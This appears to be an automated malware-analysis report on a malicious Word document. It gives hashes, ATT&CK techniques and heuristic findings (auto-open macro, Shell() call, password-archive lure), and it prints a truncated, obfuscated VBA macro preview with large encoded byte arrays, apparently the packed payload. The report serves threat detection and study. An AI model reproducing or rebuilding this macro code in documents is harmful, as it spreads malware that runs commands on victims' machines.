Office (OLE) malware analysis — malicious · 8dceb2c50d57f3e4

MALICIOUS

Office (OLE)

305.5 KB Created: 2015-12-16 14:32:00 Authoring application: Microsoft Office Word First seen: 2017-12-24

MD5: eec9588428352be8d921c8e9eb7cba43 SHA-1: 38895259d3e697b3e986ddeb9d26385f0bf28ca0 SHA-256: 8dceb2c50d57f3e4b12d8d02d8ca15f88d636367310a3e6f27eaa5a32f3bc8a6

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

This Office document contains VBA macros, including a Document_Open macro that utilizes the Shell() function. This indicates the document is designed to execute arbitrary commands, likely to download and run a secondary payload. The presence of a password-protected archive lure heuristic further suggests a multi-stage attack where the document itself is used to trick the user into providing credentials or instructions to access the actual malware.

Heuristics 6

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE

Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://www.iec.chIn document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 45572 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	45572 bytes
SHA-256: `074da90464abf51c23f7ff945226c40fabe923d1c28997bed084c25f4620b532`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True #If VBA7 Then Private Declare PtrSafe Function KLdP5FaGebJdf Lib "WAfnY2e" Alias "T7CYs9JpQeKYa" (ByVal QuhNED016lne As String, OJkjkgzBzN As Long) As Long #Else Private Declare Function KLdP5FaGebJdf lib "WAfnY2e" Alias "T7CYs9JpQeKYa"(byval QuhNED016lne as String, OJkjkgzBzN as Long ) as Long #End If Dim EFnMW9uqqwMh As String, A4cmLA5fea As Integer Dim A4cmLA5fea1() As Variant, A4cmLA5fea2() As Variant, A4cmLA5fea3() As Variant, A4cmLA5fea4() As Variant, A4cmLA5fea5() As Variant, A4cmLA5fea6() As Variant, A4cmLA5fea7() As Variant, A4cmLA5fea8() As Variant, A4cmLA5fea9() As Variant, A4cmLA5fea10() As Variant Dim A4cmLA5fea11() As Variant, A4cmLA5fea12() As Variant, A4cmLA5fea13() As Variant, A4cmLA5fea14() As Variant, A4cmLA5fea15() As Variant, A4cmLA5fea16() As Variant, A4cmLA5fea17() As Variant, A4cmLA5fea18() As Variant, A4cmLA5fea19() As Variant, A4cmLA5fea20() As Variant Dim A4cmLA5fea21() As Variant, A4cmLA5fea22() As Variant, A4cmLA5fea23() As Variant, A4cmLA5fea24() As Variant, A4cmLA5fea25() As Variant, A4cmLA5fea26() As Variant, A4cmLA5fea27() As Variant, A4cmLA5fea28() As Variant, A4cmLA5fea29() As Variant, A4cmLA5fea30() As Variant, A4cmLA5fea31() As Variant, A4cmLA5fea32() As Variant, A4cmLA5fea33() As Variant, A4cmLA5fea34() As Variant, A4cmLA5fea35() As Variant, A4cmLA5fea36() As Variant Sub LHJwPn() NrSyi8bt999vkR = 71 If Abs(6) = 57 Then OzAJDIA = 7498 Load QHW95ygCCXLKMlehi DateSerial 52, 90, 50 DeleteSetting "Qp4Y8D4vz89Olb" Randomize DyCTQ9UKs03HGVdP = EOF(96) If IsMissing(31) = True Then XwRmTkWR84BfUqAHC = 80 DWcjwawOjsm = CVErr(31) Hour 53 AppActivate 41 HDM9913zDtS = 60 End Sub Function zKK(U6jMo As Integer) As Boolean PdKLCGN = 61 Static HFBwwFtzVi0lGw38q As Byte G7UUZ5FN3z = 78 HFBwwFtzVi0lGw38q = HFBwwFtzVi0lGw38q + 1 OuWaqUF1z = 48 If HFBwwFtzVi0lGw38q = 1 Then Debug.Assert Not zKK(59) AeIBD = 73 zKK = HFBwwFtzVi0lGw38q = 0 Q9dlGz5OfQm = 70 HFBwwFtzVi0lGw38q = 0 QPM3j8cFUa0L = 81 End Function Sub OJwHPvvkNBx() WBJkej = 47 On Error Resume Next B0K8bUdQ = 54 A4cmLA5fea1() = Array(205, 250, 201, 224, 251, 227, 50, 81, 126, 59, 75, 21, 29, 69, 127, 10, 44, 1, 83, 0, 9, 44, 42, 19, 12, 8, 20, 103, 115, 80, 29, 40, 55, 1, 12, 95, 83, 111, 87, 119, 87, 109, 99, 124, 17, 55, 95, 124, 0, 117, 58, 108, 70, 117, 69, 5, 8, 48, 123, 72, 4, 99, 35, 47, 90, 9, 100, 43, 120, 27, 94, 67, 66, 68, 82, 20, 47, 85, 121, 113, 76, 97, 17, 66, 36, 110, 114, 67, 33, 120, 111, 15, 124, 66, 92, 78, 8, 60, 111, 51, 14, 87, 103, 57, 24, 47, 43, 120, 116, 100, 110, 127, 64, 70, 101, 113, 19, 41, 77, 121, 87, 75, 99, 122, 19, 32, 22, 43, 249, 199, 128, 192, 147, 140, 163, 148, 158, 143, 161, 255, 189, 177, 247, 178, 175, 189, 177, 149, 156, 142, 157, 187, 136, 179, 183, 211, 183, 196, 169, 188, 209, 231, 245, 165, 198, 251, 198, 227, 197, 249, 249, 170, 202, 244, 204, 225, 221, 147, 227, 195, 214, 234, 213, 242, 211, 159, 232, 207, 204, 249, 205, 132, 169, 240, 210, 196, 223, 156, 219, 208, 200, 194, 237) VpGcg5LX = 51 A4cmLA5fea2() = Array(189, 204, 199, 246, 225, 171, 156, 154, 204, 227, 229, 226, 226, 161, 255, 209, 220, 194, 211, 204, 139, 153, 167, 199, 170, 250, 231, 130, 225, 140, 187, 184, 248, 158, 167, 250, 247, 205, 181, 224, 183, 196, 191, 135, 163, 248, 168, 124, 109, 110, 1, 101, 89, 1, 40, 21, 94, 14, 52, 35, 35, 108, 95, 92, 24, 126, 71, 21, 14, 124, 60, 0, 73, 5, 37, 38, 7, 19, 95, 91, 8, 29, 0, 196, 165, 221, 255, 200, 166, 60, 22, 9, 58, 32, 12, 94, 12, 50, 38, 105, 43, 115, 22, 33, 111, 39, 10, 46, 88, 48, 49, 84, 14, 108, 85, 53, 19, 11, 15, 22, 108, 57, 42, 22, 53, 4, 61, 14, 112, 65, 126, 87, 101, 75, 117, 17, 109, 9, 127, 35, 6, 4, 26, 18, 104, 3, 1, 39, 94, 84, 77, 72, 6, 54, 15, 59, 108, 117, 97, 94, 22, 125, 16, 53, 68, 54, 6, 4, 70, 36, 29, 90, 74, 119, 31, 119, 37, 107, 11 ... (truncated)

SHA-256: 074da90464abf51c23f7ff945226c40fabe923d1c28997bed084c25f4620b532

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function KLdP5FaGebJdf Lib "WAfnY2e" Alias "T7CYs9JpQeKYa" (ByVal QuhNED016lne As String, OJkjkgzBzN As Long) As Long
#Else
Private Declare Function KLdP5FaGebJdf lib "WAfnY2e" Alias "T7CYs9JpQeKYa"(byval QuhNED016lne as String, OJkjkgzBzN as Long ) as Long
#End If
Dim EFnMW9uqqwMh As String, A4cmLA5fea As Integer
Dim A4cmLA5fea1() As Variant, A4cmLA5fea2() As Variant, A4cmLA5fea3() As Variant, A4cmLA5fea4() As Variant, A4cmLA5fea5() As Variant, A4cmLA5fea6() As Variant, A4cmLA5fea7() As Variant, A4cmLA5fea8() As Variant, A4cmLA5fea9() As Variant, A4cmLA5fea10() As Variant
Dim A4cmLA5fea11() As Variant, A4cmLA5fea12() As Variant, A4cmLA5fea13() As Variant, A4cmLA5fea14() As Variant, A4cmLA5fea15() As Variant, A4cmLA5fea16() As Variant, A4cmLA5fea17() As Variant, A4cmLA5fea18() As Variant, A4cmLA5fea19() As Variant, A4cmLA5fea20() As Variant
Dim A4cmLA5fea21() As Variant, A4cmLA5fea22() As Variant, A4cmLA5fea23() As Variant, A4cmLA5fea24() As Variant, A4cmLA5fea25() As Variant, A4cmLA5fea26() As Variant, A4cmLA5fea27() As Variant, A4cmLA5fea28() As Variant, A4cmLA5fea29() As Variant, A4cmLA5fea30() As Variant, A4cmLA5fea31() As Variant, A4cmLA5fea32() As Variant, A4cmLA5fea33() As Variant, A4cmLA5fea34() As Variant, A4cmLA5fea35() As Variant, A4cmLA5fea36() As Variant
Sub LHJwPn()
NrSyi8bt999vkR = 71
If Abs(6) = 57 Then OzAJDIA = 7498
Load QHW95ygCCXLKMlehi
DateSerial 52, 90, 50
DeleteSetting "Qp4Y8D4vz89Olb"
Randomize
DyCTQ9UKs03HGVdP = EOF(96)
If IsMissing(31) = True Then XwRmTkWR84BfUqAHC = 80
DWcjwawOjsm = CVErr(31)
Hour 53
AppActivate 41
HDM9913zDtS = 60
End Sub
Function zKK(U6jMo As Integer) As Boolean
PdKLCGN = 61
Static HFBwwFtzVi0lGw38q As Byte
G7UUZ5FN3z = 78
HFBwwFtzVi0lGw38q = HFBwwFtzVi0lGw38q + 1
OuWaqUF1z = 48
If HFBwwFtzVi0lGw38q = 1 Then Debug.Assert Not zKK(59)
AeIBD = 73
zKK = HFBwwFtzVi0lGw38q = 0
Q9dlGz5OfQm = 70
HFBwwFtzVi0lGw38q = 0
QPM3j8cFUa0L = 81
End Function
Sub OJwHPvvkNBx()
WBJkej = 47
On Error Resume Next
B0K8bUdQ = 54
A4cmLA5fea1() = Array(205, 250, 201, 224, 251, 227, 50, 81, 126, 59, 75, 21, 29, 69, 127, 10, 44, 1, 83, 0, 9, 44, 42, 19, 12, 8, 20, 103, 115, 80, 29, 40, 55, 1, 12, 95, 83, 111, 87, 119, 87, 109, 99, 124, 17, 55, 95, 124, 0, 117, 58, 108, 70, 117, 69, 5, 8, 48, 123, 72, 4, 99, 35, 47, 90, 9, 100, 43, 120, 27, 94, 67, 66, 68, 82, 20, 47, 85, 121, 113, 76, 97, 17, 66, 36, 110, 114, 67, 33, 120, 111, 15, 124, 66, 92, 78, 8, 60, 111, 51, 14, 87, 103, 57, 24, 47, 43, 120, 116, 100, 110, 127, 64, 70, 101, 113, 19, 41, 77, 121, 87, 75, 99, 122, 19, 32, 22, 43, 249, 199, 128, 192, 147, 140, 163, 148, 158, 143, 161, 255, 189, 177, 247, 178, 175, 189, 177, 149, 156, 142, 157, 187, 136, 179, 183, 211, 183, 196, 169, 188, 209, 231, 245, 165, 198, 251, 198, 227, 197, 249, 249, 170, 202, 244, 204, 225, 221, 147, 227, 195, 214, 234, 213, 242, 211, 159, 232, 207, 204, 249, 205, 132, 169, 240, 210, 196, 223, 156, 219, 208, 200, 194, 237)
VpGcg5LX = 51
A4cmLA5fea2() = Array(189, 204, 199, 246, 225, 171, 156, 154, 204, 227, 229, 226, 226, 161, 255, 209, 220, 194, 211, 204, 139, 153, 167, 199, 170, 250, 231, 130, 225, 140, 187, 184, 248, 158, 167, 250, 247, 205, 181, 224, 183, 196, 191, 135, 163, 248, 168, 124, 109, 110, 1, 101, 89, 1, 40, 21, 94, 14, 52, 35, 35, 108, 95, 92, 24, 126, 71, 21, 14, 124, 60, 0, 73, 5, 37, 38, 7, 19, 95, 91, 8, 29, 0, 196, 165, 221, 255, 200, 166, 60, 22, 9, 58, 32, 12, 94, 12, 50, 38, 105, 43, 115, 22, 33, 111, 39, 10, 46, 88, 48, 49, 84, 14, 108, 85, 53, 19, 11, 15, 22, 108, 57, 42, 22, 53, 4, 61, 14, 112, 65, 126, 87, 101, 75, 117, 17, 109, 9, 127, 35, 6, 4, 26, 18, 104, 3, 1, 39, 94, 84, 77, 72, 6, 54, 15, 59, 108, 117, 97, 94, 22, 125, 16, 53, 68, 54, 6, 4, 70, 36, 29, 90, 74, 119, 31, 119, 37, 107, 11
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.